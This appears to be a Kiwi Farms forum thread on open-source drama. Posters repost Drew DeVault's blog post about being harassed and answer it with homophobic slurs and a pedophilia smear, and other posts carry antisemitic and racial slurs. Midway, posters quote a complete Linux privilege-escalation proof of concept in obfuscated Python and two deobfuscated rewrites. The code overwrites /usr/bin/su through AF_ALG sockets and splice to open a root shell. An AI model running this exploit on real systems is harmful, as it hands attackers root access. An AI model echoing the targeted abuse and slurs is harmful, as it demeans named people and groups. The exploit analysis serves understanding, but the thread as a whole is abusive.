- Joined
- Apr 21, 2025
I've scanned through a few random articles on his site and there's alot of schizophrenia (over emphasis on calendrology and random imagery) embedded in it but other than that seems like pretty normal debian alogging.
Open Source Software Community - it's about ethics in Code of Conducts
- Thread starter CrunkLord420
- Start date
- Joined
- Feb 8, 2021
The name Pocock rings a bell. I remember this guy sperging on the FSF Europe lists years ago, though I don't quite remember about what and sadly it seems like the mailing list archives are only available through random archives rather than a well-indexed host. This made me me lel though:
Daniel Pocock said:
- Joined
- Mar 23, 2020
Hi Drew! I'm happy to know you keep tuning in to check if we're referring to you by your proper title, that being Drew "Lolicon/Pedophile" DeVault, and rest assured, we are! Just so you know, nobody hates you because of stupid things you said forever ago, they hate you because you are an insufferable douchebag nu-male manchild that cannot stop gargling rotting tranny ditch, Drew, that's why. Case in point:
About three years ago, a thread on Kiwi Farms was opened about me. In the years since, it has grown to about 1,200 posts full of bigots responding to anything and everything I do online with scorn, slurs, and overt bigotry. The thread is full of resources to facilitate harassment, including, among other things, all of my social media profiles, past and present, a history of my residential addresses, my phone numbers, details about my family members, a list of my usernames and password hashes from every leaked database of websites I have accounts on, and so on. Most of my articles or social media posts are archived on Kiwi Farms and then subjected to the most bigoted rebuttals you can imagine. Honestly, it’s mostly just… pathetic. But it’s a problem when it escapes containment, and it’s designed to.
Kiwi Farms is the most organized corner of the harassment which comes my way, but it comes in many forms. On Mastodon, for example, before I deleted my account I would often receive death threats, or graphic images and videos of violence against minorities. I have received a lot of hate and death threats over email, too, several of which I confess that I took some pleasure in forwarding to the sender’s employer.
One of the motivations for this harassment is to “milk” me for “drama”. The idea is to get my hackles up, make me fearful for my safety, and alienate me from my communities, with the hope that it will trigger an entertaining meltdown. Maybe people respond poorly to this kind of harassment – that’s the idea, really – and it often makes the situation worse. Responding to it can legitimize the abuse, elevate it into the discourse, draw more attention to it, and stoke the flames. It can make the victim look bad when they respond emotionally to harassment designed to evoke negative emotions. I have left it unaddressed for a long time in order to subvert this goal, and address it now with a cool head in a relatively quiet period in the harassment campaign.
The harassment waxes and wanes over time, usually picking up whenever I write a progressive blog post that gets some reach. It really took off after a series of incidents in which I called for the Hyprland community and its maintainers to be held to account for the bigotry and harassment on their Discord server (1, 2) and when I spoke out against Richard Stallman’s prolific and problematic public statements regarding the sexual abuse of minors (3).
The abuse crescendoed in October of 2024, when I was involved in editing The Stallman Report. The report is a comprehensive analysis of Richard Stallman’s problematic political discourse regarding sexual harassment, sexual assault, and the sexual abuse of minors, and it depends almost entirely on primary sources – quotes from Stallman’s website which remain online and have not been retracted to this day. The purpose of the report was to make a clear and unassailable case for Stallman’s removal from positions of power, make specific recommendations to address the underlying problems, and to stimulate a period of reflection and reform in the FOSS community. It didn’t achieve much, in the end: the retaliation from Stallman’s defenders was fiercer and more devoted than the support from those who saw the report’s sense.
Myself and the other authors asserted our moral rights to publish anonymously, motivated by our wish to reduce our exposure to the exact sort of harassment I’ve been subjected to over the years. However, I was careless in my opsec during the editing process, and it was possible to plausibly link me to the report as a result, leading to a sharp increase in harassment.
This brings me to a retaliatory, defamatory “report” published about me in the style of the Stallman Report.<a href="https://drewdevault.com/blog/Addressing-harassment/#fn-1">1</a> This report is, essentially, a distillation of the Kiwi Farms thread on me, sanitized of overt bigotry and presented in a readily linkable form in order to stalk me around the internet and enable harassment. It’s used to discredit anything I do online and push for my exclusion from online communities, by dropping the link on Hacker News, Reddit, GitHub or Codeberg issues, etc, anywhere myself or my work is mentioned, or used to discredit the Stallman Report by discrediting one of its unmasked authors.<a href="https://drewdevault.com/blog/Addressing-harassment/#fn-2">2</a>
The report is pretty obviously written in bad faith and relies on a lot of poor arguments to make the case that I’m a misogynist and a pedophile, charges I deny. It also accuses me of being a hypocrite, which I acknowledge in general terms, because, well, who isn’t. The key thing I want people who encounter this report to keep in mind is that this is the “polite” face of an organized harassment campaign.
Most reasonable readers easily dismiss the report because it is rather transparent in its bad faith. However, someone who reads it in good faith, just trying to do their due diligence, might come away from it with some reasonable concerns. Consider the following quote from my long-deleted Reddit account, /u/sircmpwn:
This comment was written 13 years ago, and I don’t stand by what I wrote. I was 19 at the time, and I was a moron. My mother had me when she was 23 years old, and the abuse I suffered at her hands during my childhood was severe, and I generalized this experience to all women. When I wrote this comment, I was one year removed from the abuse, living alone and in poverty, and early in a life-long process of coming to terms with the abuse and figuring out how to be a well-adjusted adult after 18 long years of abuse and isolation.
But an explanation is not an excuse. This comment was reprehensible, as were many of the awful ideas I held at the time. Many years later, I can recognize that this comment is misogynistic, denies the agency of children and women over their own bodies, disparages the many, many mothers who do a wonderful job raising children in difficult circumstances, and is based in argumentation which can reasonably be related to eugenics. This comment was just awful – there’s a reason this was deleted. I apologize to anyone who read it at the time, or comes across it now, and is justifiably insulted.
I don’t feel that it’s necessary to rebuke most of the report. But, there is a grain of truth in the report, the grain of truth that led me to retract my shitty Reddit comments and reflect on myself, and that grain of truth is this: in early adulthood, I was a huge asshole.
I have had more than my fair share of harmful ignorance, bad takes, sexism and misogyny, transphobic and homophobic beliefs, and worse. Moreover, I have verbally abused many people and made many of my own arguments in bad faith to support bad conclusions. Some of the people who read this will recall having found themselves at the wrong end of my verbal abuse and harassment.
It’s important for me to take responsibility for this period of my life, and in dismissing bad faith criticisms of myself to carefully avoid dismissing good faith criticisms in the same fell swoop.
I’m not really sure how to deal with this part of my life appropriately. I have apologized to a few people individually, but it’s not a scalable solution and with many people I have no business re-opening wounds to salve my own conscience. I can offer a general apology, and I will. I’ve never found the right moment to say it, but now will do: I apologise, sincerely, to everyone who I have harmed with verbal abuse and with hateful and problematic rhetoric. If you have had a bad experience or experiences with me, and there’s anything you want from me that can help you heal from that experience – a personal apology, for example – please reach out to me and ask.
That said, apologies alone aren’t enough. I believe in restorative justice, in growing and mending wounds and repairing harm done, and I set myself seriously to this task over many years. I have gone to therapy, spoken with close friends about it, and taken structural action as well: I have founded support groups and worked one-on-one with many of the people whose politics and behavior I object to. I want an amicable end to bigotry and bullying, for bigots and bullies like my former self to look forward to, to provide a path that doesn’t require them to double down. It’s not easy, and not everyone manages, but I have to look at myself and see the path I’ve taken and imagine that it’s possible, because what’s left for the likes of me if not?
This part of my past brings me a great deal of shame, and that shame motivates me to grow as a person. In a certain sense, it is an ironic, cruel privilege to have had so much cause to reflect on myself, to drive me to question myself and my ideas, and become a much better person with much more defensible ideas. It has driven me to study feminism, social justice, racial justice, intersectionality, LGBTQ theory, antifascism, and to find the intersections in my own life and strive to act out of a more legitimate sense of justice.
I’m often still a firebrand, but I’ve chosen much better hills to die on. My passion is invested in making a more just world, building safe and healthy communities, elevating my peers, and calling for justice and a just society. I have taken the lessons I have learned and tried to share them with other people, and to stand up for what I can now say I know is right, both online and in real life. Through a process of learning, reflection, and humility, I acknowledge that I have done a lot harm in my youth. To repair this harm, I have committed myself to doing more than enough good now to make sure that the world is a better place when all is said and done. That’s what justice means to me when I turn my principles inwards and hold myself accountable.
So where do we go from here?
The response to my progressive beliefs and activism is reactionary backlash, doxing, harassment, and death threats targeting me and my family, all of which is likely to escalate in response to this post, and none of which is defensible. On the other hand, I understand that the consequences for my own reactionary past is, in some cases, alienation – and, honestly, fair enough.
But I don’t want you to confuse my honest faults with the defamation and harassment I endure for standing up for my honest strengths. If you feel generous and optimistic about who I am today, and you recognize my growth, and wish for an ally in the fight for what’s right, your good faith and solidarity mean the world to me. I would appreciate it if you would express your support and rebuke harassment when you see it, and help keep me honest as I continue a life-long process of learning and growth.
If I’ve hurt you, and you want to seek reconciliation, I make myself available to you for that purpose. If I’ve hurt you, and you simply don’t care to be hurt again, I’m sorry – I understand where you’re coming from, and have made my peace with it.
Please send words of support and/or death threats to drew@ddevault.org.
Thank you.
The only hill you will die on is being impaled on Dong Gone and his associates' riven cocks, Drew, and certainly not that of justice in any sense. You are, and always were, a cowardly faggot that uses corrupt means like codes of conduct to try and force people into doing something they are unwilling to do, because even if you've never touched a child for real, you are and always will be a spiritual chomo. GRIM. (L. A.)
Addressing the harassment
– Wikipedia: Kiwi Farms
About three years ago, a thread on Kiwi Farms was opened about me. In the years since, it has grown to about 1,200 posts full of bigots responding to anything and everything I do online with scorn, slurs, and overt bigotry. The thread is full of resources to facilitate harassment, including, among other things, all of my social media profiles, past and present, a history of my residential addresses, my phone numbers, details about my family members, a list of my usernames and password hashes from every leaked database of websites I have accounts on, and so on. Most of my articles or social media posts are archived on Kiwi Farms and then subjected to the most bigoted rebuttals you can imagine. Honestly, it’s mostly just… pathetic. But it’s a problem when it escapes containment, and it’s designed to.
Kiwi Farms is the most organized corner of the harassment which comes my way, but it comes in many forms. On Mastodon, for example, before I deleted my account I would often receive death threats, or graphic images and videos of violence against minorities. I have received a lot of hate and death threats over email, too, several of which I confess that I took some pleasure in forwarding to the sender’s employer.
One of the motivations for this harassment is to “milk” me for “drama”. The idea is to get my hackles up, make me fearful for my safety, and alienate me from my communities, with the hope that it will trigger an entertaining meltdown. Maybe people respond poorly to this kind of harassment – that’s the idea, really – and it often makes the situation worse. Responding to it can legitimize the abuse, elevate it into the discourse, draw more attention to it, and stoke the flames. It can make the victim look bad when they respond emotionally to harassment designed to evoke negative emotions. I have left it unaddressed for a long time in order to subvert this goal, and address it now with a cool head in a relatively quiet period in the harassment campaign.
The harassment waxes and wanes over time, usually picking up whenever I write a progressive blog post that gets some reach. It really took off after a series of incidents in which I called for the Hyprland community and its maintainers to be held to account for the bigotry and harassment on their Discord server (1, 2) and when I spoke out against Richard Stallman’s prolific and problematic public statements regarding the sexual abuse of minors (3).
The abuse crescendoed in October of 2024, when I was involved in editing The Stallman Report. The report is a comprehensive analysis of Richard Stallman’s problematic political discourse regarding sexual harassment, sexual assault, and the sexual abuse of minors, and it depends almost entirely on primary sources – quotes from Stallman’s website which remain online and have not been retracted to this day. The purpose of the report was to make a clear and unassailable case for Stallman’s removal from positions of power, make specific recommendations to address the underlying problems, and to stimulate a period of reflection and reform in the FOSS community. It didn’t achieve much, in the end: the retaliation from Stallman’s defenders was fiercer and more devoted than the support from those who saw the report’s sense.
Myself and the other authors asserted our moral rights to publish anonymously, motivated by our wish to reduce our exposure to the exact sort of harassment I’ve been subjected to over the years. However, I was careless in my opsec during the editing process, and it was possible to plausibly link me to the report as a result, leading to a sharp increase in harassment.
This brings me to a retaliatory, defamatory “report” published about me in the style of the Stallman Report.<a href="https://drewdevault.com/blog/Addressing-harassment/#fn-1">1</a> This report is, essentially, a distillation of the Kiwi Farms thread on me, sanitized of overt bigotry and presented in a readily linkable form in order to stalk me around the internet and enable harassment. It’s used to discredit anything I do online and push for my exclusion from online communities, by dropping the link on Hacker News, Reddit, GitHub or Codeberg issues, etc, anywhere myself or my work is mentioned, or used to discredit the Stallman Report by discrediting one of its unmasked authors.<a href="https://drewdevault.com/blog/Addressing-harassment/#fn-2">2</a>
The report is pretty obviously written in bad faith and relies on a lot of poor arguments to make the case that I’m a misogynist and a pedophile, charges I deny. It also accuses me of being a hypocrite, which I acknowledge in general terms, because, well, who isn’t. The key thing I want people who encounter this report to keep in mind is that this is the “polite” face of an organized harassment campaign.
Most reasonable readers easily dismiss the report because it is rather transparent in its bad faith. However, someone who reads it in good faith, just trying to do their due diligence, might come away from it with some reasonable concerns. Consider the following quote from my long-deleted Reddit account, /u/sircmpwn:
This comment was written 13 years ago, and I don’t stand by what I wrote. I was 19 at the time, and I was a moron. My mother had me when she was 23 years old, and the abuse I suffered at her hands during my childhood was severe, and I generalized this experience to all women. When I wrote this comment, I was one year removed from the abuse, living alone and in poverty, and early in a life-long process of coming to terms with the abuse and figuring out how to be a well-adjusted adult after 18 long years of abuse and isolation.
But an explanation is not an excuse. This comment was reprehensible, as were many of the awful ideas I held at the time. Many years later, I can recognize that this comment is misogynistic, denies the agency of children and women over their own bodies, disparages the many, many mothers who do a wonderful job raising children in difficult circumstances, and is based in argumentation which can reasonably be related to eugenics. This comment was just awful – there’s a reason this was deleted. I apologize to anyone who read it at the time, or comes across it now, and is justifiably insulted.
I don’t feel that it’s necessary to rebuke most of the report. But, there is a grain of truth in the report, the grain of truth that led me to retract my shitty Reddit comments and reflect on myself, and that grain of truth is this: in early adulthood, I was a huge asshole.
I have had more than my fair share of harmful ignorance, bad takes, sexism and misogyny, transphobic and homophobic beliefs, and worse. Moreover, I have verbally abused many people and made many of my own arguments in bad faith to support bad conclusions. Some of the people who read this will recall having found themselves at the wrong end of my verbal abuse and harassment.
It’s important for me to take responsibility for this period of my life, and in dismissing bad faith criticisms of myself to carefully avoid dismissing good faith criticisms in the same fell swoop.
I’m not really sure how to deal with this part of my life appropriately. I have apologized to a few people individually, but it’s not a scalable solution and with many people I have no business re-opening wounds to salve my own conscience. I can offer a general apology, and I will. I’ve never found the right moment to say it, but now will do: I apologise, sincerely, to everyone who I have harmed with verbal abuse and with hateful and problematic rhetoric. If you have had a bad experience or experiences with me, and there’s anything you want from me that can help you heal from that experience – a personal apology, for example – please reach out to me and ask.
That said, apologies alone aren’t enough. I believe in restorative justice, in growing and mending wounds and repairing harm done, and I set myself seriously to this task over many years. I have gone to therapy, spoken with close friends about it, and taken structural action as well: I have founded support groups and worked one-on-one with many of the people whose politics and behavior I object to. I want an amicable end to bigotry and bullying, for bigots and bullies like my former self to look forward to, to provide a path that doesn’t require them to double down. It’s not easy, and not everyone manages, but I have to look at myself and see the path I’ve taken and imagine that it’s possible, because what’s left for the likes of me if not?
This part of my past brings me a great deal of shame, and that shame motivates me to grow as a person. In a certain sense, it is an ironic, cruel privilege to have had so much cause to reflect on myself, to drive me to question myself and my ideas, and become a much better person with much more defensible ideas. It has driven me to study feminism, social justice, racial justice, intersectionality, LGBTQ theory, antifascism, and to find the intersections in my own life and strive to act out of a more legitimate sense of justice.
I’m often still a firebrand, but I’ve chosen much better hills to die on. My passion is invested in making a more just world, building safe and healthy communities, elevating my peers, and calling for justice and a just society. I have taken the lessons I have learned and tried to share them with other people, and to stand up for what I can now say I know is right, both online and in real life. Through a process of learning, reflection, and humility, I acknowledge that I have done a lot harm in my youth. To repair this harm, I have committed myself to doing more than enough good now to make sure that the world is a better place when all is said and done. That’s what justice means to me when I turn my principles inwards and hold myself accountable.
So where do we go from here?
The response to my progressive beliefs and activism is reactionary backlash, doxing, harassment, and death threats targeting me and my family, all of which is likely to escalate in response to this post, and none of which is defensible. On the other hand, I understand that the consequences for my own reactionary past is, in some cases, alienation – and, honestly, fair enough.
But I don’t want you to confuse my honest faults with the defamation and harassment I endure for standing up for my honest strengths. If you feel generous and optimistic about who I am today, and you recognize my growth, and wish for an ally in the fight for what’s right, your good faith and solidarity mean the world to me. I would appreciate it if you would express your support and rebuke harassment when you see it, and help keep me honest as I continue a life-long process of learning and growth.
If I’ve hurt you, and you want to seek reconciliation, I make myself available to you for that purpose. If I’ve hurt you, and you simply don’t care to be hurt again, I’m sorry – I understand where you’re coming from, and have made my peace with it.
Please send words of support and/or death threats to drew@ddevault.org.
Thank you.
- Joined
- Nov 23, 2021
Oh boy, fresh schizophrenia!
- Joined
- Sep 22, 2021
FUUUUUUUUUCK YOU FUCKING FUCKS.
All of Linux is broken, because of CUNTING FUCKS changing the name of “MASTER” branch on repos because it’s white supremacitst or something .
Fuck OFF. Thank you for your attention to this matter.
- Joined
- Sep 28, 2021
Why are you using bitbake if you aren't a masochist?
- Joined
- Nov 14, 2022
I'm watching the latest (((Lunduke))) video right now and, considering that he is a Jew, this section in the middle is stunningly un-self-aware. Or very self-aware.
I'll transcribe it so you can raise your eyebrows together with me:
I'll transcribe it so you can raise your eyebrows together with me:
One group making themselves incompatible with other groups, primarily out of a desire to destroy those other groups. Now, of course, this is not unique to the world of tech, right? We've seen this all over the place. Leftist activists have a tendency to take these same approaches in many industries, governments, organizations all over the map. Just as a few examples, the government of Iran declares as an official policy 'death to America' and 'America is the great Satan!', thus rendering the government of Iran in its current state incompatible with the government of the USA, right? It's hard to be compatible, it's hard to work together when one groups says 'our goal is your death'. It's hard to be compatible, right?
Likewise, many Islamic nations, as official policy, punish converting to Christianity by putting converts to death. Several Islamic nations do this. Thus rendering those Islamic nations incompatible with Christianity and with Christian-friendly cultures. And this seems pretty obvious to me, when there is a single group that says 'bad group over there! They must die'. Well, clearly they're not going to be compatible now. It's hard to get along when one group wants the other group dead.
Likewise, many Islamic nations, as official policy, punish converting to Christianity by putting converts to death. Several Islamic nations do this. Thus rendering those Islamic nations incompatible with Christianity and with Christian-friendly cultures. And this seems pretty obvious to me, when there is a single group that says 'bad group over there! They must die'. Well, clearly they're not going to be compatible now. It's hard to get along when one group wants the other group dead.
And as you look over so many such examples, something stands out. It is almost always - not always, but almost - one group who demands that the other group submits or changes or dies. Well, at the same time, the others that are being attacked and banned, they tend to go out of their way to find compromise, right? Over and over again, the groups that are being attacked tend to be the ones that want to work with those who are attacking and banning them, to find a middle ground. And such is the case in the world of tech. Conservatives will work with the leftists without a second thought, while the leftist activists attack and ban conservatives.
- Joined
- Sep 23, 2018
This weird trend of giving sploits cutesy names with their own logos and web pages is goofy. I don't know what's the point of it. Also, this is how I learned that .fail is a TLD now, of all fucking things.
But yeah, it requires local access to the machine. If you don't have people with accounts on the machine which you haven't already trusted with sudo or if your server is already locked down so that you can only shell in with private keys, or if your server isn't doing retarded shit like running files untrusted users upload as executables, you don't need to sweat this.
Another thing that frustrates me is that the PoC Python script is obfuscated (even more so than Python already is lol), right down to decompressing a string literal, the same way you'd see these sorts of scripts in the wild on hacked web sites. How are you supposed to analyze this shit and see what it's actually doing? What's the point of doing this on the web site which is supposed to be explaining what a huge threat this is and how it works?
Python:
#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
try:u.recv(8+t)
except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")I asked a robot to deobfuscate it and got this, for what it's worth:
Python:
#!/usr/bin/env python3
import os
import zlib
import socket
def hex_to_bytes(hex_string):
return bytes.fromhex(hex_string)
def write_chunk(fd, offset, data):
alg_socket = socket.socket(38, 5, 0)
alg_socket.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
SOL_ALG = 279
setsockopt = alg_socket.setsockopt
setsockopt(SOL_ALG, 1, hex_to_bytes('0800010000000010' + '0' * 64))
setsockopt(SOL_ALG, 5, None, 4)
conn, _ = alg_socket.accept()
total_len = offset + 4
zero_byte = hex_to_bytes('00')
conn.sendmsg(
[b"A" * 4 + data],
[
(SOL_ALG, 3, zero_byte * 4),
(SOL_ALG, 2, b'\x10' + zero_byte * 19),
(SOL_ALG, 4, b'\x08' + zero_byte * 3),
],
32768,
)
pipe_r, pipe_w = os.pipe()
splice = os.splice
splice(fd, pipe_w, total_len, offset_src=0)
splice(pipe_r, conn.fileno(), total_len)
try:
conn.recv(8 + offset)
except:
0
fd = os.open("/usr/bin/su", 0)
index = 0
payload = zlib.decompress(
hex_to_bytes(
"78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301"
"d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b96"
"75c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"
)
)
while index < len(payload):
write_chunk(fd, index, payload[index : index + 4])
index += 4
os.system("su")So in a loop we open a socket, configure it, and dump some data into it, and a file handler to the su bin is involved in a way I don't follow. I tried de-hexing that compressed string into a file, and while
file recognizes it as zlib-compressed data, gunzip can't uncompress it, so I don't know if I'm fucking something up or if it's just weirdly compressed.Well, whatever. Lock down your systems, ladies and gents.
Last edited:
- Joined
- Sep 28, 2021
Still does that in your cleaned up version, and I assume because it's some standard shellcode that compresses well.
As for why they did it: they wanted to brag about how small it was but they were retarded, so they got the gangster computer god to codegolf for them in Python instead of writing a proper small exploit themselves (looks perfect for a Perl oneliner).
- Joined
- Feb 8, 2021
Generating PR for the guys who found it. Everybody wants to be the next Heartbleed.
gunzip expects gzip-compressed data, not zlib-compressed data (the difference is the header and the checksum). The data is an ELF binary that starts /bin/sh. Effectively, you're replacing su with a shell that has suid set, meaning it runs as root even when not invoked by root.
- Joined
- Nov 14, 2022
Codegolfing stuff
Lemme make it more readable by hand, except I couldn't be arsed to finish the job completely, so have roughly 80% disambiguated:
Python:
#!/usr/bin/env python3
import os, zlib, socket
def c(setuid_root_executable, current_position, payload):
template_socket = socket.socket(
family=socket.AF_ALG,
type=socket.SOCK_SEQPACKET,
proto=0
)
template_socket.bind((
"aead", # authenticated encryption with associated data
"authencesn(hmac(sha256),cbc(aes))" # AES-CBC encryption, ESN variant
))
template_socket.setsockopt(
level=socket.SOL_ALG,
optname=socket.ALG_SET_KEY,
value=bytes.fromhex('0800010000000010'+'0'*64) # metadata says AES encryption key length is 16 bytes, followed by 32 bytes of total key material, essentially keys of all zero
)
template_socket.setsockopt(
level=socket.SOL_ALG,
optname=socket.ALG_SET_AEAD_AUTHSIZE,
None,
4
)
operation_socket, _ = template_socket.accept()
zero = bytes.fromhex('00')
operation_socket.sendmsg(
buffers=[b"AAAA"+payload],
ancdata=[(279,3,zero*4),(279,2,b'\x10'+zero*19),(279,4,b'\x08'+zero*3),]
flags=32768
)
readpipe, writepipe = os.pipe()
os.splice(
src=setuid_root_executable,
dst=writepipe,
count=current_position+4,
offset_src=0
)
os.splice(
src=readpipe,
dst=operation_socket.fileno(),
count=current_position+4)
try:
operation_socket.recv(8+current_position)
except:
0
setuid_root_executable = os.open("/usr/bin/su", os.O_RDONLY)
current_position = 0
small_64bit_linux_ELF_binary = zlib.decompress(bytes.fromhex("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3")) # this is a 160 byte ELF executable that seemingly attempts to call setuid(0), execute /bin/sh, and exit if that fails
while current_position < len(small_64bit_linux_ELF_binary):
c(setuid_root_executable, current_position, small_64bit_linux_ELF_binary[i:i+4])
current_position += 4
os.system("su")The use of integers to refer to option names is seriously silly, but par for the course
Last edited:
- Joined
- Jul 2, 2025
I want to learn how to write C/C# code just so I could make highly important drivers for highly important codebases, just to eventually add a +NIGGER license before a major update that needs it to function, just to piss everyone off that uses it.
- Joined
- Sep 20, 2024
Man, "Lundjew" was right there, RIGHT THERE, and you fucking fumbled it.
You fucking suck, man.
- Joined
- Aug 21, 2024
Oh, it's way worse than that depending on the project, they will even change long-standing variable names just to for brownie points.
- Joined
- Sep 28, 2021
Not to pick on you, but the C# naming has been a disaster for the coding race.
A more accurate name would've been something like "Java with monopolist characteristics".
- Joined
- Sep 6, 2019
Not even a theme-song.
I don't know about you guys but if they can't even make the effort to create a theme-song or jingle I can not take the exploit seriously.
You have to up your game.
If you don't take the exploit serious enough to make a theme-song I will not take it serious either.
- Joined
- Feb 8, 2021
- Joined
- Nov 12, 2022
Yet they still have cumsum.
Its even worse because they now broke the namig convention used by matlab. These are older functions and their names come from the fact that at the time they were introduced, it was common to shorten names like that. If you see "cumtrapz" and think about tranny porn that's a problem with your brain, it was never meant to stand for anything lewd.
Its even worse because they now broke the namig convention used by matlab. These are older functions and their names come from the fact that at the time they were introduced, it was common to shorten names like that. If you see "cumtrapz" and think about tranny porn that's a problem with your brain, it was never meant to stand for anything lewd.
- Joined
- Mar 23, 2020
Giving them cool names and showcases adds to the Mythology of the Hacker, so to speak, it gives them this almost legendary character that I feel is essential to Internet and or hacker culture. And its fun. I'd much rather read about "TotaLniggeRobliteratoR" than CVE-2026-05-01-18751923507135
- Joined
- Sep 28, 2021
"Mythology of the Hacker" died with antisec. When you're not spending your zerodays on popping "security researchers" so you can humiliate them by posting their private files and communications online you've lost your sovl (and replacing Mitnick's site with "all aboard the mantrain" was trve art, and publishing the contents of "anonymous"' server was hilarious).